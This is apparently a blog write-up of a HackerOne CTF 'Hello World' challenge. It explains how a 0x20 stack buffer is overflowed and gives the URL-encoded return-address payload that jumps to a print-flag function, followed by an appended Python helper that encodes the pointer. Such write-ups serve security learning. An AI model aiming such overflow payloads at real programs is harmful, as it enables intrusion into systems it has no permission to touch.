Lawful Evil (lawful_evil) wrote,

HackerOne CTF Hello World!

On this CTF you face a "What is your name?" and an option to download the binary. 

After downloading it and Ghidra, we open it up and see that the name goes into a 0x20 buffer on the stack. OK, we should be able to overrun it and overwrite the return value. After plopping in some characters, it looks like I can enter 40, and on the next one I get a 'segmentation fault' message.

Well, I dump the ROP gadgets, using the 'ROPgadget --binary vulnerable-bin' command in Kali, and take a further look. OK... digging further into the binary, I see a 'print flag' function. OK, may not need the gadgets.

I just need to convert the address to the right order. Basically, take 0x004006ee and convert it to a 64-bit pointer that is URL-encoded: %ee%06%40%00%00%00%00%00

Boom, it prints the flag.
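The address conversion described above, as an added example that is not part of the original post: it packs the address as a 64-bit little-endian pointer, percent-encodes each byte, and decodes it back. The function names are hypothetical, and the stack layout (8 bytes of saved frame pointer directly above the 0x20 buffer, no canary or padding) is an assumption that is consistent with the 40 characters reported in the post.

```python
import struct
from urllib.parse import unquote_to_bytes

BUF_SIZE = 0x20          # buffer size the post reads from Ghidra
SAVED_RBP = 8            # assumption: saved frame pointer sits right above the buffer
PRINT_FLAG = 0x004006ee  # address of the 'print flag' function given in the post


def return_address_offset(buf_size=BUF_SIZE, saved_rbp=SAVED_RBP):
    """Bytes from the start of the buffer to the saved return address (assumed layout)."""
    return buf_size + saved_rbp


def encode_pointer(addr):
    """Pack addr as a 64-bit little-endian pointer and percent-encode every byte."""
    if not 0 <= addr < 1 << 64:
        raise ValueError("address does not fit in 64 bits")
    # "<Q" = little-endian unsigned 64-bit: least significant byte comes first
    return "".join(f"%{b:02x}" for b in struct.pack("<Q", addr))


def decode_pointer(encoded):
    """Reverse of encode_pointer: percent-decoded bytes back to an integer address."""
    raw = unquote_to_bytes(encoded)
    if len(raw) != 8:
        raise ValueError("expected exactly 8 bytes for a 64-bit pointer")
    return struct.unpack("<Q", raw)[0]


if __name__ == "__main__":
    print("offset to return address:", return_address_offset())
    print("encoded pointer:", encode_pointer(PRINT_FLAG))
    print("decoded back: 0x%08x" % decode_pointer(encode_pointer(PRINT_FLAG)))
```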
Tags: challenges, ctf, hackerone, hacking, rop